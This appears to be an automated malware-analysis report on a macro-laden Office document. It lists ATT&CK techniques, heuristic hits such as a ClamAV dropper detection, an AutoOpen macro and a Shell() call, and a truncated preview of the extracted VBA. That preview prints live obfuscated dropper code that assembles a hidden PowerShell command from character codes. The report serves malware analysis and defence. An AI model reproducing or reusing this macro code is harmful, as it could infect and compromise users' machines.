MALICIOUS
Risk score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro. Heuristics indicate the presence of an AutoOpen macro that uses the Shell() function, a critical finding suggesting execution of arbitrary commands. The ClamAV detection further confirms its malicious nature as a dropper. The VBA script, though obfuscated, explicitly uses the Shell() function, which is a primary indicator of its intent to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6595566-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6595566-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11895 bytes |

SHA-256: ddd001d052ac56f812bc7500817d2b3bfdd49764972f5107c92b1f5d8e2033fe
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "dZiAfhzzXjkh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wVAQtKHF"
Function fQDcDlUkj()
On Error Resume Next
pzwfU = 68238 + Atn(93410) / 21674 / Round(72266) / 55843 / CInt(whAFP)
jtLGtb = ChrB(26519 + Sin(ijizf * CLng(cjaPH + 36491) + 52452 + iHjNuK))
XcSrL = "HELL " + " " + " " + " " + " " + " " + " " + Chr(34) + "$" + Chr(40) + "SeT" + "-ITEM " + " 'vARiaB" + "LE:OFs'" + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s"
lGfBmK = 442 + Atn(63216) / 25053 / Round(92486) / 46114 / CInt(clzNNG)
hMGkw = ChrB(93857 + Sin(CKEWj * CLng(CUzdDw + 86778) + 22940 + DNTjiw))
aPimiY = "TrINg]" + Chr(40) + " " + "[ChAR[]] " + Chr(40) + "34," + " 74 ," + "69,116,59" + ", 10" + "4, 9" + "9,11" + "3,43, 105" + ",100 " + ", 108 ,99" + ", 10"
jtWHod = 41765 + Atn(58749) / 41660 / Round(63095) / 9192 / CInt(HpcqP)
hHnWKR = ChrB(25254 + Sin(FJsRPO * CLng(JbLzZ + 85140) + 49360 + THWrWD))
TwiqAAUUbY = "1, 114,38" + ",72,99" + ",114" + " ,40 ," + "81 , " + "99, " + "100,69, " + "106,111,9" + "9 , 104, " + "114 ,61"
aXDrBr = 10208 + Atn(24520) / 66746 / Round(9327) / 88579 / CInt(YMlERq)
wORqq = ChrB(98620 + Sin(IUOna * CLng(qSiVNX + 24909) + 50103 + Ocvfw))
YAMzmFFJn = ", 34 , 11" + "6 ,1" + "03,73, " + "59 ,33" + " ,110,114" + " , 1" + "14 , " + "118 ,60," + " 41, 4" + "1 ,113, " + "113,113" + " , 40 ,10"
mhDEA = 34199 + Atn(10457) / 45540 / Round(18005) / 62687 / CInt(stikz)
iDCFdQ = ChrB(82670 + Sin(dfuAov * CLng(AGVnL + 67523) + 48966 + lvZoA))
FAVpZNqH = "7 ,11" + "1 ,116," + "111 , 103" + ", 107 ,10" + "0 , 115, " + "114 ," + " 114, " + "115,40 ," + "101,1" + "05, " + "107 "
TrTQhQ = 52379 + Atn(93148) / 93246 / Round(18166) / 32553 / CInt(KXmLX)
lBsnN = ChrB(95388 + Sin(LFfRJE * CLng(qPKnaj + 13679) + 59683 + DJLWzY))
sKWcw = ",41 ," + " 76,97,1" + "17,1" + "06,78, " + "41 , 70" + " , 110,1" + "14 , " + "114,118, " + "60, 41, " + "41,103 , " + "111 ," + " 116 , 10"
laXED = 97902 + Atn(74277) / 61464 / Round(57397) / 41873 / CInt(WLvfmF)
VuMwkn = ChrB(25832 + Sin(QodBb * CLng(mCtqmz + 45595) + 84189 + iJFFlT))
icuriaim = "7,10" + "3, 126 " + ", 126 " + ",40 ," + "116," + " 117 ,41 " + ", 12" + "6 ,50 ,1" + "19 , "
YXGjii = 79791 + Atn(74503) / 81032 / Round(69421) / 83568 / CInt(iwCcus)
ICoAGR = ChrB(57090 + Sin(ipfic * CLng(cPGuuI + 16923) + 25659 + ABHZJ))
jKHTvzwiC = "119,103" + ",107" + " , 4" + "1, 70 " + ",110, 1" + "14 , 1" + "14 ,1" + "18 ,60" + " ,41 ,"
chKMBL = 73370 + Atn(69055) / 43215 / Round(807) / 29123 / CInt(MGzLB)
LFivh = ChrB(99990 + Sin(avvoww * CLng(TmGHUV + 51020) + 51983 + fkufHw))
mSwToPdH = "41,1" + "13 ,1" + "13 , 113," + " 40," + " 100 ," + " 105,104" + " ,117, 1"
fQDcDlUkj = XcSrL + aPimiY + TwiqAAUUbY + YAMzmFFJn + FAVpZNqH + sKWcw + icuriaim + jKHTvzwiC + mSwToPdH
JpAsO = 7982 + Atn(92236) / 63271 / Round(23) / 20623 / CInt(bQqvXB)
jZAqq = ChrB(60465 + Sin(kPCKnU * CLng(iomwwF + 56310) + 30314 + ZHJtzK))
End Function
Function CMsvKJnPub()
On Error Resume Next
jMsHbW = 11621 + Atn(36551) / 97372 / Round(40616) / 7963 / CInt(otWMqz)
bEzZwu = ChrB(32397 + Sin(aihmpZ * CLng(TwuMB + 14466) + 66588 + zcBzb))
rkrbczsi = "03 ,111" + ", 114 ," + " 99 ,116 " + ", 103" + " ,118, 1" + "11 ,103,1" + "17,105,11" + "6 , " + "111, 99 " + ",104, 11"
DuTtBj = 91314 + Atn(74147) / 74232 / Round(92774) / 26641 / CInt(nfkRj)
EYZXS = ChrB(56369 + Sin(pskzwu * CLng(pkXoNs + 76545) + 81025 + jLwwr))
HZkGq = "4, 10" + "3 ,111" + ", 11" + "7,40 ," + " 101 , 10" + "5 ,10" + "7,41,8"
Djitm = 89824 + Atn(3973) / 46085 / Round(61348) / 54359 / CInt(vLqKpp)
SUCHw = ChrB(6937 + Sin(aOEtLT * CLng(GWpBOD + 14680) + 319 + MrLXzb))
rdwPXkq = "2,67, 85" + " , 82, 4" + "9 ,49,49" + " ,41 , 84" + " , 8" + "0 ,97 ,11" + "6, 82," + "75,1" + "26, 41,"
JrWwfX = 32087 + Atn(91553) / 74344 / Round(59530) / 6368 / CInt(jziUI) o ... (truncated)
```